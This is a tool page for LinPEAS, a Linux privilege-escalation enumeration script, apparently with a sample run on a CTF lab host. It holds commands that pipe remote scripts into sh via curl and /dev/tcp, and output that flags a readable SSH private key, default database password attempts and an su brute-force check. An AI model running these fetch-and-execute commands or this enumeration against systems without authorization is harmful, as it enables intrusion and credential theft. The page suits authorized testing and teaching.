LinPEAS
Jump to navigation
Jump to search
Description
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix* hosts
Installation
From github
$ curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
Local network
$ python -m SimpleHTTPServer 80 $ curl 10.10.10.10/linpeas.sh | sh
Without curl
$ nc -q 5 -lvnp 80 < linpeas.sh $ cat < /dev/tcp/10.10.10.10/80 | sh
Output to file
$ linpeas -a > /dev/shm/linpeas.txt $ less -r /dev/shm/linpeas.txt
Options
- -h
- To show this message
- -q
- Do not show banner
- -a
- All checks (1min of processes and su brute) - Noisy mode, for CTFs mainly
- -s
- SuperFast (don't check some time consuming checks) - Stealth mode
- -w
- Wait execution between big blocks
- -n
- Do not export env variables related with history
- -o
- Only execute selected checks (SysI, Devs, AvaSof, ProCronSrvcs, Net, UsrI, SofI, IntFiles). Select a comma separated list.
- -d <IP/NETMASK>
- Discover hosts using fping or ping. Ex: -d 192.168.0.1/24
- -p <PORT(s)> -d <IP/NETMASK>
- Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139
- -i <IP> [-p <PORT(s)>]
- Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080
- Notice that if you select some network action, no PE check will be performed
Example
$ ./linpeas.sh -a | tee linepeas.txt
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
linpeas v2.5.0 by carlospolop
ADVISORY: linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 99% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username
====================================( Basic information )=====================================
OS: Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
User & Groups: uid=1001(jan) gid=1001(jan) groups=1001(jan)
Hostname: basic2
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.4.0-119-generic (buildd@lcy01-amd64-013) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #143-Ubuntu SMP Mon Apr 2 16:08:24 UTC 2018
Distributor ID: Ubuntu
Description: Ubuntu 16.04.4 LTS
Release: 16.04
Codename: xenial
[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.16
[+] PATH
[i] Any writable folder in original PATH? (a new completed path will be exported)
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
[+] Date
Thu Apr 30 04:22:33 EDT 2020
[+] System stats
Filesystem Size Used Avail Use% Mounted on
udev 224M 0 224M 0% /dev
tmpfs 49M 3.3M 46M 7% /run
/dev/xvda1 14G 2.4G 11G 19% /
tmpfs 244M 4.0K 244M 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 244M 0 244M 0% /sys/fs/cgroup
tmpfs 49M 0 49M 0% /run/user/1001
total used free shared buff/cache available
Mem: 498068 103444 160196 1712 234428 353216
Swap: 1045500 145340 900160
[+] Environment
[i] Any private information inside environment variables?
HISTFILESIZE=0
MAIL=/var/mail/jan
SSH_CLIENT=10.9.35.106 51288 22
USER=jan
SHLVL=1
HOME=/home/jan
SSH_TTY=/dev/pts/0
LOGNAME=jan
_=./linpeas.sh
XDG_SESSION_ID=3
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
SHELL=/bin/bash
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=10.9.35.106 51288 10.10.226.157 22
HISTFILE=/dev/null
[+] Looking for Signature verification failed in dmseg
Not Found
[+] selinux enabled? .............. sestatus Not Found
[+] Printer? ...................... lpstat Not Found
[+] Is this a container? .......... No
[+] Is ASLR enabled? .............. Yes
=========================================( Devices )==========================================
[+] Any sd* disk in /dev? (limit 20)
[+] Unmounted file-system?
[i] Check if you can mount umounted devices
UUID=cdbcec40-cb66-49dd-ad6b-be757c8140cf / ext4 errors=remount-ro 0 1
UUID=db3bdca8-5517-4600-b896-e8479e05e44a none swap sw 0 0
====================================( Available Software )====================================
[+] Useful software
/bin/nc
/bin/netcat
/bin/nc.traditional
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python
/usr/bin/python2
/usr/bin/python3
/usr/bin/python2.7
/usr/bin/perl
/usr/bin/sudo
[+] Installed Compiler
/usr/share/gcc-5
================================( Processes, Cron, Services & Timers )================================
[+] Cleaned processes
[i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
daemon 849 0.0 0.3 26044 1956 ? Ss 02:35 0:00 /usr/sbin/atd -f
jan 14284 0.0 0.4 4704 2052 pts/0 S+ 04:22 0:00 /bin/sh ./linpeas.sh -a
jan 14285 0.0 0.1 7296 668 pts/0 S+ 04:22 0:00 tee linepeas.txt
jan 14477 0.0 0.6 37364 3280 pts/0 R+ 04:22 0:00 ps aux
jan 14479 0.0 0.1 15808 772 pts/0 S+ 04:22 0:00 sort
jan 2266 0.0 0.6 45276 3028 ? Ss 04:16 0:00 /lib/systemd/systemd --user
jan 2269 0.0 0.3 61540 1664 ? S 04:16 0:00 (sd-pam)
jan 2301 0.0 0.7 92832 3620 ? S 04:16 0:00 sshd: jan@pts/0
jan 2302 0.0 1.0 22572 5088 pts/0 Ss 04:16 0:00 -bash
message+ 824 0.0 0.7 42952 3560 ? Ss 02:35 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 1012 0.0 0.0 5220 116 ? Ss 02:36 0:00 /sbin/iscsid
root 1013 0.0 0.7 5720 3516 ? S<Ls 02:36 0:00 /sbin/iscsid
root 1 0.2 0.8 38088 4416 ? Ss 02:35 0:18 /sbin/init
root 1110 0.0 0.3 15936 1568 tty1 Ss+ 02:36 0:00 /sbin/agetty --noclear tty1 linux
root 1111 0.0 0.3 15752 1952 ttyS0 Ss+ 02:36 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
root 1142 0.0 0.7 71584 3592 ? Ss 02:36 0:00 /usr/sbin/apache2 -k start
root 1224 0.0 0.7 240008 3932 ? Ss 02:36 0:00 /usr/sbin/nmbd -D
root 356 0.0 0.6 27704 3000 ? Ss 02:35 0:01 /lib/systemd/systemd-journald
root 395 0.0 0.2 94772 1272 ? Ss 02:35 0:00 /sbin/lvmetad -f
root 411 0.0 0.7 44696 3612 ? Ss 02:35 0:02 /lib/systemd/systemd-udevd
root 811 0.0 0.6 28620 3012 ? Ss 02:35 0:00 /lib/systemd/systemd-logind
root 814 0.0 0.5 29008 2692 ? Ss 02:35 0:00 /usr/sbin/cron -f
root 830 0.0 0.8 275896 4252 ? Ssl 02:35 0:00 /usr/lib/accountsservice/accounts-daemon
root 837 0.0 2.0 277936 10024 ? Ssl 02:35 0:00 /usr/lib/snapd/snapd
root 841 0.0 0.5 636820 2724 ? Ssl 02:35 0:04 /usr/bin/lxcfs /var/lib/lxcfs/
root 846 0.0 0.1 4396 812 ? Ss 02:35 0:00 /usr/sbin/acpid
root 872 0.0 0.7 277176 3956 ? Ssl 02:35 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 873 0.0 0.0 13372 144 ? Ss 02:35 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 890 0.0 1.1 337920 5668 ? Ss 02:36 0:00 /usr/sbin/smbd -D
root 902 0.0 0.7 329804 3628 ? S 02:36 0:00 /usr/sbin/smbd -D
root 921 0.0 0.5 16124 2496 ? Ss 02:36 0:00 /sbin/dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
root 961 0.0 0.8 337920 4072 ? S 02:36 0:00 /usr/sbin/smbd -D
root 981 0.0 0.8 65508 4224 ? Ss 02:36 0:00 /usr/sbin/sshd -D
syslog 851 0.0 0.5 256392 2756 ? Ssl 02:35 0:00 /usr/sbin/rsyslogd -n
systemd+ 493 0.0 0.4 100324 2268 ? Ssl 02:35 0:00 /lib/systemd/systemd-timesyncd
tomcat9 994 2.1 9.5 2539580 47444 ? Sl 02:36 2:18 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -Djava.util.logging.config.file=/opt/tomcat-latest/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Dfile.encoding=UTF-8 -Dnet.sf.ehcache.skipUpdateCheck=true -XX:+UseConcMarkSweepGC -XX:+CMSClassUnloadingEnabled -XX:+UseParNewGC -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512m -Xmx512m -Dignore.endorsed.dirs= -classpath /opt/tomcat-latest/bin/bootstrap.jar:/opt/tomcat-latest/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat-latest -Dcatalina.home=/opt/tomcat-latest -Djava.io.tmpdir=/opt/tomcat-latest/temp org.apache.catalina.startup.Bootstrap start
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
www-data 1145 0.0 0.8 820212 4132 ? Sl 02:36 0:02 /usr/sbin/apache2 -k start
www-data 1146 0.0 0.7 623628 3896 ? Sl 02:36 0:02 /usr/sbin/apache2 -k start
[+] Binary processes permissions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
0 lrwxrwxrwx 1 root root 4 Apr 17 2018 /bin/sh -> dash
1.6M -rwxr-xr-x 1 root root 1.6M Mar 8 2018 /lib/systemd/systemd
320K -rwxr-xr-x 1 root root 319K Mar 8 2018 /lib/systemd/systemd-journald
608K -rwxr-xr-x 1 root root 605K Mar 8 2018 /lib/systemd/systemd-logind
140K -rwxr-xr-x 1 root root 139K Mar 8 2018 /lib/systemd/systemd-timesyncd
444K -rwxr-xr-x 1 root root 443K Mar 8 2018 /lib/systemd/systemd-udevd
44K -rwxr-xr-x 1 root root 44K Nov 30 2017 /sbin/agetty
476K -rwxr-xr-x 1 root root 476K Mar 5 2018 /sbin/dhclient
0 lrwxrwxrwx 1 root root 20 Mar 8 2018 /sbin/init -> /lib/systemd/systemd
768K -rwxr-xr-x 1 root root 766K Jul 26 2017 /sbin/iscsid
52K -rwxr-xr-x 1 root root 51K Apr 16 2016 /sbin/lvmetad
504K -rwxr-xr-x 1 root root 502K Nov 8 2017 /sbin/mdadm
220K -rwxr-xr-x 1 root root 219K Jan 12 2017 /usr/bin/dbus-daemon
20K -rwxr-xr-x 1 root root 19K Nov 8 2017 /usr/bin/lxcfs
164K -rwxr-xr-x 1 root root 162K Nov 3 2016 /usr/lib/accountsservice/accounts-daemon
0 lrwxrwxrwx 1 root root 15 Mar 14 2018 /usr/lib/jvm/java-1.8.0-openjdk-amd64/bin/java -> ../jre/bin/java
16K -rwxr-xr-x 1 root root 15K Jan 17 2016 /usr/lib/policykit-1/polkitd
21M -rwxr-xr-x 1 root root 21M Nov 30 2017 /usr/lib/snapd/snapd
48K -rwxr-xr-x 1 root root 47K Apr 8 2016 /usr/sbin/acpid
648K -rwxr-xr-x 1 root root 647K Sep 18 2017 /usr/sbin/apache2
28K -rwxr-xr-x 1 root root 27K Jan 14 2016 /usr/sbin/atd
44K -rwxr-xr-x 1 root root 44K Apr 5 2016 /usr/sbin/cron
244K -rwxr-xr-x 1 root root 243K Mar 7 2018 /usr/sbin/nmbd
588K -rwxr-xr-x 1 root root 586K Apr 5 2016 /usr/sbin/rsyslogd
72K -rwxr-xr-x 1 root root 71K Mar 7 2018 /usr/sbin/smbd
776K -rwxr-xr-x 1 root root 773K Jan 18 2018 /usr/sbin/sshd
[+] Different processes executed during 1 min (interesting is low number of repetitions)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs
[+] Cron jobs
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-jobs
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 589 Jul 16 2014 mdadm
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 190 Apr 17 2018 popularity-contest
/etc/cron.daily:
total 64
drwxr-xr-x 2 root root 4096 Apr 19 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 539 Jul 16 2014 mdadm
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 383 Mar 7 2016 samba
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
[+] Services
[i] Search for outdated versions
[ + ] acpid
[ + ] apache-htcacheclean
[ + ] apache2
[ + ] apparmor
[ + ] apport
[ + ] atd
[ - ] bootmisc.sh
[ - ] checkfs.sh
[ - ] checkroot-bootclean.sh
[ - ] checkroot.sh
[ + ] console-setup
[ + ] cron
[ - ] cryptdisks
[ - ] cryptdisks-early
[ + ] dbus
[ + ] grub-common
[ - ] hostname.sh
[ - ] hwclock.sh
[ + ] irqbalance
[ + ] iscsid
[ + ] keyboard-setup
[ - ] killprocs
[ + ] kmod
[ - ] lvm2
[ + ] lvm2-lvmetad
[ + ] lvm2-lvmpolld
[ + ] lxcfs
[ - ] lxd
[ + ] mdadm
[ - ] mdadm-waitidle
[ - ] mountall-bootclean.sh
[ - ] mountall.sh
[ - ] mountdevsubfs.sh
[ - ] mountkernfs.sh
[ - ] mountnfs-bootclean.sh
[ - ] mountnfs.sh
[ + ] networking
[ + ] nmbd
[ + ] ondemand
[ + ] open-iscsi
[ - ] open-vm-tools
[ - ] plymouth
[ - ] plymouth-log
[ + ] procps
[ + ] rc.local
[ + ] resolvconf
[ - ] rsync
[ + ] rsyslog
[ + ] samba
[ + ] samba-ad-dc
[ - ] screen-cleanup
[ - ] sendsigs
[ + ] smbd
[ + ] ssh
[ + ] udev
[ + ] ufw
[ - ] umountfs
[ - ] umountnfs.sh
[ - ] umountroot
[ + ] unattended-upgrades
[ + ] urandom
[ - ] uuidd
[ - ] x11-common
[+] System timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Thu 2020-04-30 06:08:42 EDT 1h 44min left Thu 2020-04-30 02:35:53 EDT 1h 47min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Thu 2020-04-30 16:05:00 EDT 11h left Thu 2020-04-30 02:35:53 EDT 1h 47min ago apt-daily.timer apt-daily.service
Fri 2020-05-01 02:50:42 EDT 22h left Thu 2020-04-30 02:50:42 EDT 1h 33min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2020-05-04 01:14:13 EDT 3 days left Thu 2020-04-30 03:38:42 EDT 45min ago snapd.refresh.timer snapd.refresh.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
n/a n/a n/a n/a ureadahead-stop.timer ureadahead-stop.service
===================================( Network Information )====================================
[+] Hostname, hosts and DNS
basic2
127.0.0.1 localhost
127.0.1.1 basic2
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
nameserver 10.0.0.2
search eu-west-1.compute.internal
[+] Content of /etc/inetd.conf & /etc/xinetd.conf
/etc/inetd.conf Not Found
[+] Networks and neighbours
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
eth0 Link encap:Ethernet HWaddr 02:c0:e9:ff:bc:ac
inet addr:10.10.226.157 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::c0:e9ff:feff:bcac/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:110790 errors:0 dropped:0 overruns:0 frame:0
TX packets:107628 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:10296501 (10.2 MB) TX bytes:19616371 (19.6 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:228 errors:0 dropped:0 overruns:0 frame:0
TX packets:228 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:16416 (16.4 KB) TX bytes:16416 (16.4 KB)
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default ip-10-10-0-1.eu 0.0.0.0 UG 0 0 0 eth0
10.10.0.0 * 255.255.0.0 U 0 0 0 eth0
[+] Iptables rules
iptables rules Not Found
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN -
tcp 0 3828 10.10.226.157:22 10.9.35.106:51288 ESTABLISHED -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::445 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 :::8009 :::* LISTEN -
tcp6 0 0 :::139 :::* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
udp 0 0 10.10.255.255:137 0.0.0.0:* -
udp 0 0 10.10.226.157:137 0.0.0.0:* -
udp 0 0 0.0.0.0:137 0.0.0.0:* -
udp 0 0 10.10.255.255:138 0.0.0.0:* -
udp 0 0 10.10.226.157:138 0.0.0.0:* -
udp 0 0 0.0.0.0:138 0.0.0.0:* -
udp 0 0 0.0.0.0:50228 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
[+] Can I sniff with tcpdump?
No
====================================( Users Information )=====================================
[+] My user
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#groups
uid=1001(jan) gid=1001(jan) groups=1001(jan)
[+] Do I have PGP keys?
gpg Not Found
[+] Clipboard or highlighted text?
xsel and xclip Not Found
[+] Testing 'sudo -l' without password & /etc/sudoers
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
[+] Checking /etc/doas.conf
/etc/doas.conf Not Found
[+] Checking Pkexec policy
[Configuration]
AdminIdentities=unix-user:0
[Configuration]
AdminIdentities=unix-group:sudo;unix-group:admin
[+] Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds
It's not possible to brute-force su.
[+] Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
[+] Superusers
root:x:0:0:root:/root:/bin/bash
[+] Users with console
jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
root:x:0:0:root:/root:/bin/bash
[+] All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1000(kay) gid=1000(kay) groups=1000(kay),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=1001(jan) gid=1001(jan) groups=1001(jan)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=999(tomcat9) gid=999(tomcat9) groups=999(tomcat9)
uid=9(news) gid=9(news) groups=9(news)
[+] Login now
04:23:46 up 1:48, 1 user, load average: 0.29, 0.24, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jan pts/0 10.9.35.106 04:16 1:14 0.24s 0.00s w
[+] Last logons
kay tty1 Wed Apr 18 09:20 - down (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:45 - 09:25 (19:39)
kay tty1 Wed Apr 18 09:02 - crash (-19:-16)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:27 - 09:25 (19:58)
kay tty1 Tue Apr 17 13:21 - crash (00:05)
reboot system boot 4.4.0-119-generi Tue Apr 17 13:14 - 09:25 (20:10)
kay tty1 Tue Apr 17 13:05 - down (00:08)
reboot system boot 4.4.0-87-generic Tue Apr 17 13:00 - 13:14 (00:14)
wtmp begins Tue Apr 17 13:00:02 2018
[+] Last time logon each user
Username Port From Latest
kay pts/0 192.168.56.102 Mon Apr 23 16:04:07 -0400 2018
jan pts/0 10.9.35.106 Thu Apr 30 04:16:21 -0400 2020
[+] Password policy
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
Caching directories . . . . . . . . . . . . . . . DONE
===================================( Software Information )===================================
[+] MySQL version
mysql Not Found
[+] MySQL connection using default root/root ........... No
[+] MySQL connection using root/toor ................... No
[+] MySQL connection using root/NOPASS ................. No
[+] Looking for mysql credentials and exec
Not Found
[+] PostgreSQL version and pgadmin credentials
Not Found
[+] PostgreSQL connection to template0 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template1 using postgres/NOPASS ........ No
[+] PostgreSQL connection to template0 using pgsql/NOPASS ........... No
[+] PostgreSQL connection to template1 using pgsql/NOPASS ........... No
[+] Apache server info
Version: Server version: Apache/2.4.18 (Ubuntu)
Server built: 2017-09-18T15:09:02
[+] Looking for PHPCookies
Not Found
[+] Looking for Wordpress wp-config.php files
wp-config.php Not Found
[+] Looking for Tomcat users file
tomcat-users.xml Not Found
[+] Mongo information
Not Found
[+] Looking for supervisord configuration file
supervisord.conf Not Found
[+] Looking for cesi configuration file
cesi.conf Not Found
[+] Looking for Rsyncd config file
/usr/share/doc/rsync/examples/rsyncd.conf
[ftp]
comment = public archive
path = /var/www/pub
use chroot = yes
lock file = /var/lock/rsyncd
read only = yes
list = yes
uid = nobody
gid = nogroup
strict modes = yes
ignore errors = no
ignore nonreadable = yes
transfer logging = no
timeout = 600
refuse options = checksum dry-run
dont compress = *.gz *.tgz *.zip *.z *.rpm *.deb *.iso *.bz2 *.tbz
[+] Looking for Hostapd config file
hostapd.conf Not Found
[+] Looking for wifi conns file
Not Found
[+] Looking for Anaconda-ks config files
anaconda-ks.cfg Not Found
[+] Looking for .vnc directories and their passwd files
.vnc Not Found
[+] Looking for ldap directories and their hashes
/etc/ldap
The password hash is from the {SSHA} to 'structural'
[+] Looking for .ovpn files and credentials
.ovpn Not Found
[+] Looking for ssl/ssh files
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
